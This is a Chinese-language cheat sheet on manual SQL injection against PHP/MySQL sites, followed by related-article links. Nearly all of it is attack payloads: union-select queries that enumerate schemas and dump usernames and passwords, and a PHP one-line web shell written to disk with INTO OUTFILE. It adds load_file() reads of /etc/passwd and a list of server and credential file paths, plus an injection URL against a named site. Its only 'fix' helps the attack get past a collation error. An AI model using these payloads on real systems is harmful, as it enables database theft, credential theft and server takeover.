PHP+MySQL手工注入问题及修复
注入利用解析:
暴字段长度:order by num/*
匹配字段:and 1=1 union select 1,2,3,4,5…….n/*
暴字段位置:and 1=2 union select 1,2,3,4,5…..n/*
利用内置函数暴数据库信息:version()、database()、user()
不用猜解可用字段暴数据库信息(某些网站可能不适用):and 1=2 union all select version() /*,and 1=2 union all select database() /*,and 1=2 union all select user() /*
操作系统信息:and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:and ord(mid(user(),1,1))=114 /* 返回正常说明为root暴库 (mysql>5.0),Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表:and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
猜字段:and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码:and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
直接写马(Root权限),操作条件:
1、知道站点物理路径
2、有足够大的权限(可以用select …. from mysql.user测试)
3、magic_quotes_gpc()=OFFselect ‘<?php eval($_POST[cmd])?>’ into outfile ‘物理路径’and 1=2 union all select 一句话HEX值 into outfile '路径'
load_file() 常用路径:
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:\APACHE\Apache2\conf\httpd.conf
9、C:\Program Files\mysql\my.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
17 、/etc/my.cnf MYSQL的配置文件
18、 /etc/redhat-release 红帽子的系统版本
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5 b/php.ini //PHP相关设置
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24、c:\windows\my.ini
25、c:\boot.ini
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
说明:Char(60)表示Char(32)表示空格
手工注射时出现的问题:
当注射后页面显示:Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
如:http://huweishen.com /instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x4337747.netC626F6F742E696E69),3,4,user()%20, 这是由于前后编码不一致造成的。
解 决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:http://huweishen.com /instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x4337747.netC626F6F742E696E69))),3,4,unhex(hex(user()))%20
PHP+MySQL手工注入问题及修复相关推荐
- mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析
前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...
- mysql报错注入实战_手工注入——MySQL手工注入实战和分析
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- 记一次MySQL手工注入
本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎) 小 ...
- mysql手工注入imformation_网络安全系列之十八 MySQL基本操作(PHP注入基础)
在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据库,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据库的特点来构造查询语句. ...
- PHP+MySQL手工注入
1.发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id= ...
- mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程
0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...
- MYSQL手工注入某日本网站
经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了.找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一.去了解注入,还是有必要的 ...
- mysql手工注入imformation_SQL 注入总结
0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术. 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 G ...
最新文章
- 案例:来自Uber的Go语言GC优化实践
- 关于Python函数的一些问题
- 程序员:你真的该养生了
- dbgrideh标题排序
- 6年前的Dubbo,2年前的Spring Cloud,都被这个架构干掉了
- js里用append()和appendChild有什么区别?
- 反射的应用之动态代理,顺便复习静态代理
- 二次规划与非线性规划及matlab应用
- 哪里可以做TEM/HRTEM/EDS/线扫/Mapping测试、EBSD测试
- 视频教程-2020年软考网络工程师基础知识历年真题详解软考视频教程-软考
- qt 取消按钮点击效果_Qt 对话框里添加确定取消按钮
- 2021.09青少年软件编程(Python)等级考试试卷(五级)
- java 如何读取解析 mac 下的 pages 文稿,实现数据库正向工程
- 解决对话框的圆角背景图片黑色部分
- python画图颜色设置_python画图--输出指定像素点的颜色值方法
- 微星z370安装linux系统,在MSI z370主板上安装win7和BIOS设置的详细教程
- 周期函数的傅里叶级数展开
- AXP221电源管理芯片使用注意点
- C语言通过QR分解计算矩阵的特征值和特征向量
- 算法工程师的正常研发流程